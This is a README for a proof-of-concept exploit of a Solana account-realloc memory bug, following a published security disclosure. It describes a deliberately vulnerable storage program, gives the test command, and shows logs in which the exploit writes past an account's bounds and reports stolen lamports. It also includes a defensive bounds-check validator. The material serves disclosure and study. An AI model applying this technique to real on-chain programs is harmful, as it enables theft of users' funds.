Arrowana/realloc-bug-exploit-poc
Solana realloc bug exploit POC

Based on the comprehensive report from osec

https://twitter.com/osec_io/status/1601371947794804737

The rekt cloud program is a naive program that allows storage of arbitrary data; the first 32 bytes are used to store the authority allowed to write to or resize the storage.

It allows batching actions, which is essential: the instruction has to exit with the account in a state that still satisfies the runtime checks.

This makes it a simple-to-understand candidate for leveraging and exploiting the flaw. Ensuring rent exemption is left to the user to keep the program simple.
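As an added, defence-in-depth check on the program side (not code from this repository), here is a validator for the "write at offset" action against the layout described above: the signer must match the 32-byte authority header, writes may not overlap the header, and offset plus length must stay within the data length the runtime actually allocated. The function, constant and error names are assumptions.

```rust
// Added example, not the rekt-cloud program's own code. Names below
// (AUTHORITY_LEN, WriteError, validate_write, write_checked) are assumed.

/// The first 32 bytes of the account data hold the authority pubkey.
pub const AUTHORITY_LEN: usize = 32;

#[derive(Debug, PartialEq, Eq)]
pub enum WriteError {
    /// Signer does not match the stored authority.
    WrongAuthority,
    /// Write would land in the authority header.
    HeaderOverlap,
    /// offset + len overflows or exceeds the account's real data length.
    OutOfBounds,
}

/// Check a write of `payload` at `offset` into `account_data` requested by `signer`.
/// `account_data.len()` is the length actually allocated for this account;
/// anything beyond it is not this account's memory and must be refused.
pub fn validate_write(
    account_data: &[u8],
    signer: &[u8; 32],
    offset: usize,
    payload: &[u8],
) -> Result<(), WriteError> {
    if account_data.len() < AUTHORITY_LEN || account_data[..AUTHORITY_LEN] != signer[..] {
        return Err(WriteError::WrongAuthority);
    }
    if offset < AUTHORITY_LEN {
        return Err(WriteError::HeaderOverlap);
    }
    // checked_add rejects wraparound of offset + len as well as plain overruns.
    let end = offset.checked_add(payload.len()).ok_or(WriteError::OutOfBounds)?;
    if end > account_data.len() {
        return Err(WriteError::OutOfBounds);
    }
    Ok(())
}

/// Apply the write only after it has passed validation.
pub fn write_checked(
    account_data: &mut [u8],
    signer: &[u8; 32],
    offset: usize,
    payload: &[u8],
) -> Result<(), WriteError> {
    validate_write(account_data, signer, offset, payload)?;
    account_data[offset..offset + payload.len()].copy_from_slice(payload);
    Ok(())
}
```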

Somehow the tests have to be run from the repository root with BPF_OUT_DIR=$(pwd)/target/deploy cargo test-bpf -- --nocapture; otherwise the native runtime is loaded, which is badly broken.

Manipulate lamport fields to steal lamports from an unexpected program-owned account

programs/rekt-cloud/tests/test_rekt.rs

[2022-12-11T05:33:09.931917557Z DEBUG solana_runtime::message_processor::stable_log] Program log: Welcome to Rekt cloud
...
[2022-12-11T05:33:09.989084403Z DEBUG solana_runtime::message_processor::stable_log] Program log: Initializing G2ydLrkb73SS51q7UCVkNoWbf4ecSho2xU2NCkADtFMN...
[2022-12-11T05:33:09.992174651Z DEBUG solana_runtime::message_processor::stable_log] Program log: Resizing G2ydLrkb73SS51q7UCVkNoWbf4ecSho2xU2NCkADtFMN...
[2022-12-11T05:33:09.995091090Z DEBUG solana_runtime::message_processor::stable_log] Program log: Writing to G2ydLrkb73SS51q7UCVkNoWbf4ecSho2xU2NCkADtFMN...
[2022-12-11T05:33:09.996112170Z DEBUG solana_runtime::message_processor::stable_log] Program log: Writing at 10384, original data: [0, 196, 230, 158, 1, 0, 0, 0]
[2022-12-11T05:33:09.998725147Z DEBUG solana_runtime::message_processor::stable_log] Program log: Writing to G2ydLrkb73SS51q7UCVkNoWbf4ecSho2xU2NCkADtFMN...
[2022-12-11T05:33:09.999703979Z DEBUG solana_runtime::message_processor::stable_log] Program log: Writing at 1020720, original data: [0, 0, 0, 0, 0, 0, 0, 0]
[2022-12-11T05:33:10.002209378Z DEBUG solana_runtime::message_processor::stable_log] Program log: Resizing G2ydLrkb73SS51q7UCVkNoWbf4ecSho2xU2NCkADtFMN...
[2022-12-11T05:33:10.002296729Z DEBUG solana_runtime::message_processor::stable_log] Program log: See you later!
...
Stolen lamports: 6960890880

Manipulate program-owned account data

TODO

Remote code execution

Not possible
